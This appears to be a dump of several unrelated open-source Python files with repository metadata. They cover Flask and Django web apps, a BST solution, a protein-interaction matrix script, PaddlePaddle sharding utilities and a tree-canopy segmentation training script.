b4199952fdd0dccb29de5104b84e01be8057babf | d7aaacce581943b22c36943e6e487a5641bf4f03 | /src/friendlypins/thumbnail.py | 14898ef0301c6c1b400e6aadcecda0643ed514ed | [
"Apache-2.0"
] | permissive | TheFriendlyCoder/friendlypins | a8bac31f941fbb96dd5422d873acece59e6944ae | 5f7f4a70c1681f1177a14d4aa7669797e2f5bdcd | refs/heads/master | 2021-11-08T00:28:23.054020 | 2021-03-07T00:32:05 | 2021-03-07T00:32:05 | 127,459,545 | 5 | 0 | Apache-2.0 | 2021-10-21T18:43:19 | 2018-03-30T18:19:37 | Python | UTF-8 | Python | false | false | 1,121 | py | """Primitives for operating on Pinterest pins"""
import logging
import json
class Thumbnail(object):
"""Abstraction around a Pin's thumbnail"""
def __init__(self, data):
"""
Args:
data (dict): Raw Pinterest API data describing a thumbnail
"""
self._log = logging.getLogger(__name__)
self._data = data
def __str__(self):
return json.dumps(dict(self._data), sort_keys=True, indent=4)
def __repr__(self):
return "<{0} ({1}x{2})>".format(
self.__class__.__name__,
self.width,
self.height)
@property
def width(self):
"""int: The width of the thumbnail image, in pixels"""
return int(self._data['original']['width'])
@property
def height(self):
"""int: The height of the thumbnail image, in pixels"""
return int(self._data['original']['height'])
@property
def url(self):
"""str: Source URL where the thumbnail image can be found"""
return self._data['original']['url']
if __name__ == "__main__": # pragma: no cover
pass
| [
"thefriendlycoder@gmail.com"
] | thefriendlycoder@gmail.com |
096aa9fd40cf41cf3019872c32497b5338e2fef0 | f696cf7d4eacb113b399c26796a254aa9e4e8635 | /services/suspicious/scripts/wsgi.py | ea891341d41bb52c3898ed4f3b81327fcd40d28d | [] | no_license | VladyslavKurmaz/spot-monitor | 6eb10533c5ff7dcb3811d0bd9ee4387e87a3f8e6 | 2c49f7fc9dda780715102538edc4094daac68c36 | refs/heads/master | 2021-04-30T05:19:31.711215 | 2018-04-02T14:20:06 | 2018-04-02T14:20:06 | 121,412,700 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | from logging.config import fileConfig
fileConfig("./logging.conf")
from app import app
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8001, threaded=True) | [
"oleksandr.popovych@globallogic.com"
] | oleksandr.popovych@globallogic.com |
c9ceee3b6bd55136e70ee6e21bb059a28b3d963b | 27305b08ae1378fd9b84b6f48a79e5896fc38e9b | /jogos/routes.py | b57c2c18d563239686ff9b5518fd453f60f97d71 | [] | no_license | carloshdurante/tabela_brasileirao | 404d3d112236db078d49a73b411c0a26de181863 | 318497ba9ea8195a64ede95d6727289eb7f519a4 | refs/heads/master | 2023-05-10T09:58:52.146492 | 2021-06-07T07:43:31 | 2021-06-07T07:43:31 | 374,576,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,714 | py | from flask import render_template, redirect, url_for, flash, request
from flask_login import login_required
from jogos import bp
from jogos.forms import NovoJogoForm
from models import Jogo, Time
from brasileirao import db
from sqlalchemy.exc import IntegrityError
@bp.route('/')
@login_required
def index():
    """Render the list of matches for the current round."""
    rodada_jogos = Jogo.jogos_rodada()
    return render_template('listarjogos.html', title='Jogos', jogos=rodada_jogos)
@bp.route('/new', methods=['GET', 'POST'])
@login_required
def create():
    """Create a new match from the submitted form.

    GET renders an empty form; POST validates it, inserts the match, and
    redirects to the list. A duplicate fixture (IntegrityError) re-renders
    the form with a duplication error.
    """
    form = NovoJogoForm()
    # Both team selects share the same (id, name) choices.
    times = list(Time.query.with_entities(Time.id, Time.nome))
    form.mandante.choices = times
    form.visitante.choices = times
    if form.validate_on_submit():
        jogo = Jogo(rodada=form.rodada.data, data=form.data.data,
                    time_mandante_id=form.mandante.data,
                    gols_mandante=form.gols_mandante.data,
                    amarelos_mandante=form.amarelos_mandante.data,
                    vermelhos_mandante=form.vermelhos_mandante.data,
                    time_visitante_id=form.visitante.data,
                    gols_visitante=form.gols_visitante.data,
                    amarelos_visitante=form.amarelos_visitante.data,
                    vermelhos_visitante=form.vermelhos_visitante.data)
        try:
            db.session.add(jogo)
            db.session.commit()
        except IntegrityError:
            # A unique constraint presumably forbids repeating a fixture.
            db.session.rollback()
            e = {'Duplicidade': ["Esta partida já ocorrreu"]}
            return render_template('novojogo.html', title='Novo Jogo',
                                   form=form, jogo=None, errors=e)
        else:
            return redirect(url_for('jogos.index'))
    # GET, or POST with validation errors: render the form (with its errors).
    return render_template('novojogo.html', title='Novo Jogo', form=form,
                           jogo=None, errors=form.errors)
@bp.route('/<int:id>/edit', methods=['GET', 'POST'])
@login_required
def update(id):
    """Edit the match with the given primary key.

    GET pre-fills the form from the stored match; a valid POST copies the
    form fields back onto the row, commits, and redirects to the list.
    """
    jogo = Jogo.query.get_or_404(id)
    form = NovoJogoForm()
    # Both team selects share the same (id, name) choices.
    times = list(Time.query.with_entities(Time.id, Time.nome))
    form.mandante.choices = times
    form.visitante.choices = times
    if form.validate_on_submit():
        jogo.rodada = form.rodada.data
        jogo.data = form.data.data
        jogo.time_mandante_id = form.mandante.data
        jogo.gols_mandante = form.gols_mandante.data
        jogo.amarelos_mandante = form.amarelos_mandante.data
        jogo.vermelhos_mandante = form.vermelhos_mandante.data
        jogo.time_visitante_id = form.visitante.data
        jogo.gols_visitante = form.gols_visitante.data
        jogo.amarelos_visitante = form.amarelos_visitante.data
        jogo.vermelhos_visitante = form.vermelhos_visitante.data
        db.session.add(jogo)
        db.session.commit()
        flash('Your changes have been saved.')
        return redirect(url_for('jogos.index'))
    elif request.method == 'GET':
        # Pre-populate the form with the current values.
        form.rodada.data = jogo.rodada
        form.data.data = jogo.data
        form.mandante.data = jogo.time_mandante_id
        form.gols_mandante.data = jogo.gols_mandante
        form.amarelos_mandante.data = jogo.amarelos_mandante
        form.vermelhos_mandante.data = jogo.vermelhos_mandante
        form.visitante.data = jogo.time_visitante_id
        form.gols_visitante.data = jogo.gols_visitante
        form.amarelos_visitante.data = jogo.amarelos_visitante
        form.vermelhos_visitante.data = jogo.vermelhos_visitante
    # Invalid POST falls through and re-renders with form.errors.
    return render_template('novojogo.html', form=form, title="Editar Jogo",
                           jogo=jogo, errors=form.errors)
@bp.route('/<int:id>/delete')
@login_required
def delete(id):
    """Remove the match with the given primary key, then return to the list.

    NOTE(review): deletion over GET is vulnerable to CSRF/prefetch — consider
    switching to POST.
    """
    partida = Jogo.query.get_or_404(id)
    db.session.delete(partida)
    db.session.commit()
    return redirect(url_for('jogos.index'))
| [
"carlos.durante@outlook.com"
] | carlos.durante@outlook.com |
6ff66a5e7100cbdd1877f359622be88b41e19b2c | c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce | /flask/flaskenv/Lib/site-packages/keras_applications/inception_v3.py | 1b825c0ce4aea562e468b337a5843f63810f57d5 | [] | no_license | AhsonAslam/webapi | 54cf7466aac4685da1105f9fb84c686e38f92121 | 1b2bfa4614e7afdc57c9210b0674506ea70b20b5 | refs/heads/master | 2020-07-27T06:05:36.057953 | 2019-09-17T06:35:33 | 2019-09-17T06:35:33 | 208,895,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:6bdeecc0c5e0341451f5d87e17d12c89a210b6161e1b066aca6e02bc425b2abf
size 14598
| [
"github@cuba12345"
] | github@cuba12345 |
a2db034c1d50da2e34891134fde2e681c236bfe9 | 8c97bb5c1086ba74530d22f9c50819397978a974 | /users/models.py | c3b92318a1becc6ff1ca1bf09ce162088cb82cfb | [] | no_license | AKTANBEK/github_lecture | 57b9f3ba608ff74d6f8869a3a65ad40048a381c4 | 4a451d7637ed30e25e5d0f30b6ecfbabe18f57ff | refs/heads/master | 2023-05-01T23:50:44.522990 | 2021-05-28T11:53:50 | 2021-05-28T11:53:50 | 363,147,068 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | from django.db import models
from django.contrib.auth.models import User
class Profile(models.Model):
    """Per-user profile; one row per auth user."""

    # Deleting the User cascades to its Profile.
    user = models.OneToOneField(User, on_delete=models.CASCADE)

    def __str__(self):
        """Show the owning user's username in admin listings and shells."""
        return self.user.username
| [
"uaqwe1147@gmail.com"
] | uaqwe1147@gmail.com |
2e4a78b6ce6826ea057191500296c3f66e2baed0 | d55b7c1896cfa69f9972a111c5cc33e5721587a2 | /Trees/convertSortedArrayToBST.py | db6c176d2ae558121c9bbe05da6c9dd2be3aa542 | [] | no_license | SumaDodo/Programming-concepts | 6777f530d70cc8167ffa599e675bfd059260c0d0 | bdb453dbcec5da65f5c99b0b91c1e230faa68178 | refs/heads/master | 2020-03-26T22:26:28.081618 | 2019-10-26T07:11:54 | 2019-10-26T07:11:54 | 145,458,878 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 678 | py | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def sortedArrayToBST(self, nums):
        """
        Convert a sorted (ascending) array into a height-balanced BST.

        The middle element becomes the root; the halves left/right of it
        become the left/right subtrees, recursively.

        :type nums: List[int]
        :rtype: TreeNode
        """
        # Base case also covers the empty input (returns None).
        if not nums:
            return None
        # Floor division: `length/2` was a float under Python 3 and crashed
        # when used as an index/slice bound.
        mid = len(nums) // 2
        root = TreeNode(nums[mid])
        root.left = self.sortedArrayToBST(nums[:mid])
        root.right = self.sortedArrayToBST(nums[mid + 1:])
        return root
| [
"noreply@github.com"
] | noreply@github.com |
568aa59ae896f8dcad1d6c4c19a117a22a0ff63c | c4d05bf624ce277b35d83ba8ba9636f26043280e | /project/urls.py | d6e90307036ceed43e1f6355ce2dc672ebb0e233 | [
"Apache-2.0"
] | permissive | DrMartiner/kaptilo_back | 2366b3a2b5c9bd9dc57c9091ff5fd0025963668d | df7f716030edbb1a70388fcbb808b0985dabefbf | refs/heads/main | 2023-04-09T03:12:52.274388 | 2021-03-22T09:48:39 | 2021-03-22T09:48:39 | 349,943,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 862 | py | from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.urls import path, include
from apps.link.views import OriginalLinkRedirectView
# Branding for the Django admin site.
admin.site.site_header = "Kaptilo"
admin.site.site_title = "Kaptilo"
admin.site.index_title = "Welcome to Kaptilo admin-panel"
# URL routing:
# - short-link redirect at the root (catch-all uuid segment),
# - versioned API under /api/v1/,
# - the REAL admin hidden at /admin/super-sec/,
# - /admin/ serves the admin_honeypot decoy to log intrusion attempts.
urlpatterns = [
    path("<str:uuid>/", OriginalLinkRedirectView.as_view(), name="original-link-redirect"),
    path("api/v1/", include(("apps.api.urls", "apps.api"), namespace="api_v1")),
    path("admin/super-sec/", admin.site.urls),
    path("admin/", include("admin_honeypot.urls", namespace="admin_honeypot")),
]
# Serve static and media files from Django only during development.
if settings.DEBUG:
    urlpatterns += staticfiles_urlpatterns()
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"DrMartiner@GMail.Com"
] | DrMartiner@GMail.Com |
61089b5be8aca25aef1be234390e37e45c3041ed | 0107625e299239a0b4231445b4c2618b9af1922e | /lib/kernel/test/kernel_bench.spec | 8de60dae31702c317c6e39c02d9ca728d6fdac99 | [
"Apache-2.0"
] | permissive | couchbasedeps/erlang | 2e06918303e2aa065d77624efb4d17a3116a854a | abd486acf586207ee2c3e8dd3589e817527887c0 | refs/heads/couchbase-madhatter | 2023-07-09T08:02:53.966922 | 2022-12-19T23:38:56 | 2022-12-19T23:38:56 | 30,359,045 | 2 | 8 | Apache-2.0 | 2023-03-29T16:19:50 | 2015-02-05T14:20:04 | Erlang | UTF-8 | Python | false | false | 46 | spec | {groups,"../kernel_test",zlib_SUITE,[bench]}.
| [
"john@erlang.org"
] | john@erlang.org |
8d6b7100e1ca9bc1aa8edd46c91935f9aebbd87e | 3a1be455fc5e117bd8792ed46c59793f8b29a01f | /python/paddle/distributed/sharding/group_sharded.py | 6fd4caa7b4a5c41e73fcf95ac50d0253bb3e7c79 | [
"Apache-2.0"
] | permissive | liyancas/Paddle | 42d5e7c71c37b4e63bf54e6e31e82e40aef044ce | 98303291d27cb831b19111d82793159cbe9a85ca | refs/heads/develop | 2022-05-21T03:27:16.497238 | 2022-04-01T00:52:17 | 2022-04-01T00:52:17 | 72,499,865 | 0 | 0 | Apache-2.0 | 2022-02-11T08:16:37 | 2016-11-01T03:17:41 | Python | UTF-8 | Python | false | false | 9,839 | py | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import logging
from enum import Enum
import paddle
from paddle.optimizer import Optimizer
from paddle.distributed.utils import get_logger
from paddle.distributed.fleet.meta_optimizers.dygraph_optimizer.sharding_optimizer_stage2 import ShardingOptimizerStage2
from paddle.distributed.fleet.meta_parallel.sharding.sharding_stage2 import ShardingStage2
from paddle.distributed.fleet.meta_parallel.sharding.sharding_stage3 import ShardingStage3
from paddle.distributed.fleet.meta_parallel.sharding.sharding_utils import ShardingScaler
logger_ = get_logger(logging.INFO)
def group_sharded_parallel(model,
                           optimizer,
                           level,
                           scaler=None,
                           group=None,
                           offload=False,
                           sync_buffers=False,
                           buffer_max_size=2**23,
                           segment_size=2**20,
                           sync_comm=False):
    """
    Use group_sharded_parallel can perform group shared configuration on the model, optimizer and GradScaler. Level has three string options, 'os', 'os_g' and 'p_g_os' corresponds to three different usage scenarios: optimizer state segmentation, optimizer state + gradient segmentation, and parameter + gradient + optimizer state segmentation.
    Usually, optimizer state + gradient segmentation is actually a re optimization of optimizer state segmentation, so optimizer state + gradient segmentation can be used to realize optimizer state segmentation.

    Args:
        model (Layer): The layer to be wrapped with group_sharded_parallel.
        optimizer (Optimizer): The optimizer to be wrapped with group_sharded_parallel.
        level (str): The different level of the group sharded. Such as `os`, `os_g`, `p_g_os`.
        scaler (GradScaler, optional): If AMP is used, you need to pass GradScaler. Defaults to None, indicating that GradScaler is not used.
        group (Group, optional): The group instance. Defaults to None, indicating that the default environment group is used.
        offload (bool, optional): Whether to use the offload function. Defaults to False, which means that the offload function is not used.
        sync_buffers (bool, optional): Whether to broadcast model buffers. It is generally used when there are registered model buffers. Defaults to False, indicating that model buffers are not used.
        buffer_max_size (int, optional): The max size of the buffer used to integrate gradient in `os_g`. The larger the size, the more GPU memory will be used. Defaults to 2**23, which means that the dimension of the buffer is 2**23.
        segment_size (int, optional): The smallest size of parameter to be sharded in `p_g_os`. Defaults to 2**20, indicating that the dimension of the minimum segmented parameter is 2**20.
        sync_comm (bool, optional): Whether to use synchronous communication, only in `p_g_os` used. Defaults to False, indicating that asynchronous communication is used.

    Returns:
        model: A wrapper for group sharded given model.
        optimizer: A wrapper for group sharded given optimizer.
        scaler: A wrapper for group sharded given scaler.

    Examples:
        .. code-block:: python

            # required: distributed
            import paddle
            from paddle.fluid.dygraph.nn import Linear
            from paddle.distributed import fleet
            from paddle.distributed.sharding import group_sharded_parallel

            fleet.init(is_collective=True)
            group = paddle.distributed.new_group([0, 1])
            model = Linear(1000, 1000)

            clip = paddle.nn.ClipGradByGlobalNorm(clip_norm=1.0)
            optimizer = paddle.optimizer.AdamW(learning_rate=0.001, parameters=model.parameters(), weight_decay=0.00001, grad_clip=clip)
            scaler = paddle.amp.GradScaler(init_loss_scaling=1024)

            # wrap sharding model, optimizer and scaler
            model, optimizer, scaler = group_sharded_parallel(model, optimizer, "p_g", scaler=scaler)

            img, label = data
            label.stop_gradient = True
            img.stop_gradient = True

            out = model(img)
            loss = paddle.nn.functional.cross_entropy(input=out, label=label)

            loss.backward()
            optimizer.step()
            optimizer.clear_grad()
    """
    # Validate option types up front so misuse fails fast.
    assert isinstance(
        model,
        paddle.nn.Layer), "The model must be the instance of paddle.nn.Layer."
    assert isinstance(
        optimizer, Optimizer
    ), "The optimizer must be the instance of paddle.optimizer.Optimizer."
    assert level in ['os', 'os_g', 'p_g_os'
                     ], "The level must be os, os_g or p_g_os."

    # AMP (fp16) parameters cannot be trained without a GradScaler.
    params_fp16 = [p for p in model.parameters() if p.dtype == paddle.float16]
    if scaler is None and params_fp16:
        raise ValueError("Please enter the correct scaler.")

    # Convert model/optimizer according to the requested sharding level.
    if level in ['os', 'os_g']:
        logger_.info("*" * 30)
        logger_.info("Sharded level os uses sharded level os_g achieved now.")
        logger_.info("*" * 30)
        optimizer = ShardingOptimizerStage2(
            params=model.parameters(),
            optim=optimizer,
            group=group,
            offload=offload)
        model = ShardingStage2(
            model,
            optimizer,
            group=group,
            sync_buffers=sync_buffers,
            buffer_max_size=buffer_max_size)
    elif level == 'p_g_os':
        model = ShardingStage3(
            model,
            optimizer=optimizer,
            group=group,
            sync_buffers=sync_buffers,
            segment_size=segment_size,
            offload=offload,
            sync_comm=sync_comm)
    else:
        # Unreachable given the assert above; kept as a defensive guard.
        raise ValueError("Please enter the correct level.")

    # Only wrap the scaler when fp16 params exist and a paddle GradScaler was given.
    if params_fp16 and isinstance(scaler, paddle.amp.GradScaler):
        scaler = ShardingScaler(scaler)
    logger_.info("*" * 30)
    logger_.info(
        "If there is a communication hang using group sharded, please check whether the communication operations of each process are unified."
    )
    logger_.info("*" * 30)

    return model, optimizer, scaler
def save_group_sharded_model(model, output, optimizer=None):
    """
    Group sharded encapsulated model and optimizer state saving module.

    .. note::
        If using save_group_sharded_model saves the model. When loading again, you need to set the model or optimizer state before using group_sharded_parallel.

    Args:
        model (Layer): A wrapper for group sharded given model.
        output (str): Save directory.
        optimizer (Optimizer, optional): Group sharded encapsulated optimizer. Defaults to None, indicating that the optimizer state is not saved.

    Examples:
        .. code-block:: python

            # required: distributed
            import paddle
            from paddle.fluid.dygraph.nn import Linear
            from paddle.distributed import fleet
            from paddle.distributed.sharding import group_sharded_parallel, save_group_sharded_model

            fleet.init(is_collective=True)
            group = paddle.distributed.new_group([0, 1])
            model = Linear(1000, 1000)

            clip = paddle.nn.ClipGradByGlobalNorm(clip_norm=1.0)
            optimizer = paddle.optimizer.AdamW(learning_rate=0.001, parameters=model.parameters(), weight_decay=0.00001, grad_clip=clip)

            # wrap sharding model, optimizer and scaler
            model, optimizer, scaler = group_sharded_parallel(model, optimizer, "p_g", scaler=scaler)

            img, label = data
            label.stop_gradient = True
            img.stop_gradient = True

            out = model(img)
            loss = paddle.nn.functional.cross_entropy(input=out, label=label)

            loss.backward()
            optimizer.step()
            optimizer.clear_grad()

            # save model and optimizer state_dict
            # (arguments follow the signature: model, output directory, optimizer)
            save_group_sharded_model(model, output_dir, optimizer=optimizer)
    """
    logger_.info(
        "==========Begin to save group sharded model and optimizer==========")
    # `output` must be a directory; create it when missing.
    assert not os.path.isfile(
        output
    ), "Saving directory ({}) should be a directory, not a file".format(output)
    os.makedirs(output, exist_ok=True)
    output_model = os.path.join(output, "model.pdmodel")
    if isinstance(model, ShardingStage2):
        paddle.save(model._layer.state_dict(), output_model)
    elif isinstance(model, ShardingStage3):
        # Stage-3 shards must be gathered (to CPU when offloading) before the
        # full state dict can be saved.
        convert2cpu = bool(model._offload)
        model.get_all_parameters(convert2cpu=convert2cpu)
        paddle.save(model._layer.state_dict(), output_model)
    else:
        raise ValueError(
            "Please use the layer which is wrapped with group_sharded_parallel.")

    if optimizer is not None:
        assert hasattr(
            optimizer, "_optim"
        ), "Please use the optimizer which is wrapped with group_sharded_parallel."
        output_opt = os.path.join(output, "model.pdopt")
        paddle.save(optimizer._optim.state_dict(), output_opt)
    logger_.info(
        "==========End to save group sharded model and optimizer==========")
| [
"noreply@github.com"
] | noreply@github.com |
cb40eb72702412c39e279e92f220c505c9ded27a | 47d380ce6ab4c1110921702e996e34a91b50e7e3 | /code/createAdjacencyMatrix.py | 6c335e6970d3933a6e6f0e33a74af6618e9faeca | [] | no_license | stamakro/revival-ppi | 7af4299cef3103f66c7dea79bb50ca7b5fee4e9c | b7102abba7584fe0583abc6c1315adf52cb7c450 | refs/heads/master | 2022-12-18T09:51:02.338318 | 2020-09-17T12:26:09 | 2020-09-17T12:26:09 | 239,557,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,423 | py | import numpy as np
import pickle
from scipy.sparse import csr_matrix, save_npz
import sys
# Build a (sparse) protein-protein interaction adjacency matrix for one species.
# Usage: createAdjacencyMatrix.py <species> [<prefix>] [<excludeUnannotated 0|1>]
species = sys.argv[1]
try:
    prefix = sys.argv[2]
except IndexError:
    prefix = 'P_'
try:
    excludeUnannotated = bool(int(sys.argv[3]))
except IndexError:
    excludeUnannotated = True

path = '../data/' + species + '/interactions/'

# Choose the edge list: annotated-only, or including unannotated proteins.
if excludeUnannotated:
    inFileName = path + 'ppi-clean'
else:
    inFileName = path + 'ppi-clean+unannotated'

# First pass: collect the set of all proteins appearing in the edge list.
proteins = set()
with open(inFileName) as f:
    for line in f:
        for protein in line.split():
            proteins.add(protein)

# Annotated gene order defines the first rows of the matrix.
with open('../data/' + species + '/annotations/' + prefix + 'geneNames.pkl', 'rb') as f:
    geneNamesY = pickle.load(f)

protein2row = dict()
for i, g in enumerate(geneNamesY):
    protein2row[g] = i

if not excludeUnannotated:
    # Append unannotated proteins after the annotated ones (continuing from
    # the last enumerate index `i`) and persist the row ordering.
    for p in proteins:
        if p not in protein2row:
            i += 1
            protein2row[p] = i

    with open('../data/' + species + '/interactions/unannotatedProteinOrderBiogrid.pkl', 'wb') as f:
        pickle.dump(protein2row, f)

# Second pass: fill the symmetric 0/1 adjacency matrix.
A = np.zeros((len(protein2row), len(protein2row)), int)

with open(inFileName) as f:
    for line in f:
        [p1, p2] = line.split()

        i = protein2row[p1]
        j = protein2row[p2]

        A[i, j] = 1
        A[j, i] = 1

# NOTE(review): `outFile` is assigned but never used — looks like leftover code.
outFile = path + ''
if excludeUnannotated:
    save_npz(path + 'final/biogrid/A.npz', csr_matrix(A))
else:
    save_npz(path + 'final/biogrid/A+unannotated.npz', csr_matrix(A))
| [
"stavrosmakrodi@login3.hpc.tudelft.nl"
] | stavrosmakrodi@login3.hpc.tudelft.nl |
8065d754386fc0b3762e05f4fc04a7f53121086e | 9da6c375dbf1af87622a2ba0fb773e8f513d8021 | /cli/bak.20200512-local/abcombo.py | a267f8c6d9d445c64cdd848a3d93c27eb4e147ce | [] | no_license | wri/tree_canopy_fcn | a80a9971403f6ca2548d44146ed08aa22d7d559e | 78f742e4e26e34008417468f73413643edde801e | refs/heads/master | 2022-10-11T03:25:41.503263 | 2020-06-16T12:39:21 | 2020-06-16T12:39:21 | 236,492,565 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,895 | py | import os,sys
PROJECT_DIR='/home/ericp/tree_canopy_fcn/repo'
sys.path.append(PROJECT_DIR)
from pprint import pprint
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
from torch_kit.loss import MaskedLoss
import torch_kit.functional as F
from torch_kit.optimizers.radam import RAdam
import pytorch_models.deeplab.model as dm
import pytorch_models.unet.model as um
from utils.dataloader import HeightIndexDataset, CATEGORY_BOUNDS
from config import BUILTUP_CATEGORY_THRESHOLDS
#
# RUN CONFIG
#
BATCH_SIZE=8
DEFAULT_OPTIMIZER='adam'
LRS=[1e-3,1e-4]  # candidate learning rates
NB_CATEGORIES=len(CATEGORY_BOUNDS)+1  # height classes plus one extra class
# # AB STATS: ALL
# MEANS=[100.83741572079242, 100.4938850966076, 86.63500986931308, 118.72746674454453]
# STDEVS=[42.098045003124774, 39.07388735786421, 39.629813116928815, 34.72351480486876]
# DSETS_PATH='../datasets/los_angeles-plieades-lidar_USGS_LPC_CA_LosAngeles_2016_LAS_2018.STATS.csv'
# AB STATS: 2015,16 Train/valid
# Per-band normalization statistics for the active dataset CSV below.
MEANS=[94.79936157686979, 92.8912348691044, 80.50194782393349, 108.14889758142212]
STDEVS=[36.37876660224377, 33.22686387734999, 33.30808192430284, 30.075380846943716]
DSETS_PATH='../datasets/los_angeles-plieades_naip-lidar_USGS_LPC_CA_LosAngeles_2016_LAS_2018.STATS.csv'
YEAR_MAX=2016  # only keep rows with input_year <= this
# # NAIP STATS: ALL (<2017)
# MEANS=[106.47083152919251, 104.25520495313522, 98.61836143687523, 119.95594400425841]
# STDEVS=[38.23711386806666, 34.410688920150264, 31.468324931640534, 31.831786730471276]
# DSET_PATH=f'{PROJECT_DIR}/datasets/los_angeles-naip-lidar_USGS_LPC_CA_LosAngeles_2016_LAS_2018.STATS.csv'
# # NAIP ONLY
# IBNDS={
# 	'4': { 'min': 0 },  # ndvi
# 	'5': { 'min': -0.35} # ndwi
# }
# # PLIEDES INPUT
IBNDS=None  # optional per-band input value bounds (None = no filtering)
#
# TORCH_KIT CLI
#
def model(**cfig):
    """Build the segmentation model named by cfig['type'] ('dlv3p' or 'unet').

    `out_ch` defaults to NB_CATEGORIES; the model is moved to GPU when one
    is available.
    """
    _header('model', cfig)
    model_type = cfig.pop('type', 'dlv3p')
    cfig['out_ch'] = cfig.get('out_ch', NB_CATEGORIES)
    if model_type == 'unet':
        net = um.UNet(**cfig)
    elif model_type == 'dlv3p':
        net = dm.DeeplabV3plus(**cfig)
    else:
        raise ValueError(f'model_type ({model_type}) not implemented')
    return net.cuda() if torch.cuda.is_available() else net
def criterion(**cfig):
    """Build a CrossEntropyLoss.

    Keyword config:
        weights (list, optional): per-class weights; moved to GPU when available.
        ignore_index (int, optional): target value to exclude from the loss.
    """
    ignore_index = cfig.get('ignore_index')
    weights = cfig.get('weights')
    print("criterion:", ignore_index, weights)
    if weights:
        weights = torch.Tensor(weights)
        if torch.cuda.is_available():
            weights = weights.cuda()
    if ignore_index is not None:
        criterion = nn.CrossEntropyLoss(weight=weights, ignore_index=ignore_index)
    else:
        criterion = nn.CrossEntropyLoss(weight=weights)
    return criterion
def optimizer(**cfig):
    """Return the optimizer class selected by cfig['name'] ('adam' or 'radam').

    :raises ValueError: if the requested optimizer is not implemented.
    """
    _header('optimizer', cfig)
    opt_name = cfig.get('name', DEFAULT_OPTIMIZER)
    if opt_name == 'adam':
        return torch.optim.Adam
    elif opt_name == 'radam':
        return RAdam
    # BUG FIX: the ValueError used to be constructed but never raised, so an
    # unknown name fell through to `return optimizer` -> UnboundLocalError.
    raise ValueError(f'optimizer "{opt_name}" not implemented')
def loaders(**cfig):
    """Build (train, valid) HeightIndexDataset loaders from the dataset CSV.

    Returns:
        (dl_train, dl_valid) when enough rows exist for the batch size,
        otherwise (False, False).
    """
    # INITIAL DATASET HANDLING: split the catalog by dset_type and year.
    dsets_df = pd.read_csv(DSETS_PATH)
    train_df = dsets_df[dsets_df.dset_type == 'train']
    valid_df = dsets_df[dsets_df.dset_type == 'valid']
    train_df = train_df[train_df.input_year <= YEAR_MAX].iloc[1:6 * 8 + 1]
    valid_df = valid_df[valid_df.input_year <= YEAR_MAX]
    example_path = train_df.rgbn_path.iloc[0]
    #
    # on with the show
    #
    dev = cfig.get('dev')
    vmap = cfig.get('vmap')  # accepted but currently unused
    batch_size = cfig.get('batch_size', BATCH_SIZE)
    augment = cfig.get('augment', True)
    shuffle = cfig.get('shuffle', True)
    no_data_value = cfig.get('no_data_value', False)
    cropping = cfig.get('cropping', None)
    float_cropping = cfig.get('float_cropping', None)
    update_version = cfig.get('update_version', False)  # accepted but currently unused
    print('AUGMENT:', augment)
    print('SHUFFLE:', shuffle)
    print('BATCH_SIZE:', batch_size)
    print('NO DATA VALUE:', no_data_value)
    print('CROPPING:', cropping)
    print('FLOAT CROPPING:', float_cropping)
    if (train_df.shape[0] >= batch_size * 8) and (valid_df.shape[0] >= batch_size * 2):
        if dev:
            train_df = train_df.sample(batch_size * 8)
            valid_df = valid_df.sample(batch_size * 2)
        dl_train = HeightIndexDataset.loader(
            batch_size=batch_size,
            band_indices=['ndvi'],
            category_bounds=HeightIndexDataset.NAIP_GREEN,
            input_bounds=IBNDS,
            dataframe=train_df,
            means=MEANS,
            stdevs=STDEVS,
            no_data_value=no_data_value,
            cropping=cropping,
            float_cropping=float_cropping,
            example_path=example_path,
            augment=augment,
            train_mode=True,
            target_dtype=np.int,
            shuffle_data=shuffle)
        # BUG FIX: a premature `return dl_train, None` here made the
        # validation loader (and the final return) unreachable.
        dl_valid = HeightIndexDataset.loader(
            batch_size=batch_size,
            band_indices=['ndvi'],
            category_bounds=HeightIndexDataset.NAIP_GREEN,
            input_bounds=IBNDS,
            dataframe=valid_df,
            means=MEANS,
            stdevs=STDEVS,
            no_data_value=no_data_value,
            cropping=cropping,
            float_cropping=float_cropping,
            example_path=example_path,
            augment=augment,
            train_mode=True,
            target_dtype=np.int,
            shuffle_data=shuffle)
        print("SIZE:", train_df.shape[0], valid_df.shape[0])
        return dl_train, dl_valid
    else:
        print('NOT ENOUGH DATA', train_df.shape[0], valid_df.shape[0], batch_size * 8, batch_size * 30)
        return False, False
#
# HELPERS
#
def _header(title,cfig=None):
print('='*100)
print(title)
print('-'*100)
if cfig:
pprint(cfig)
| [
"bguzder-williams@wri.org"
] | bguzder-williams@wri.org |
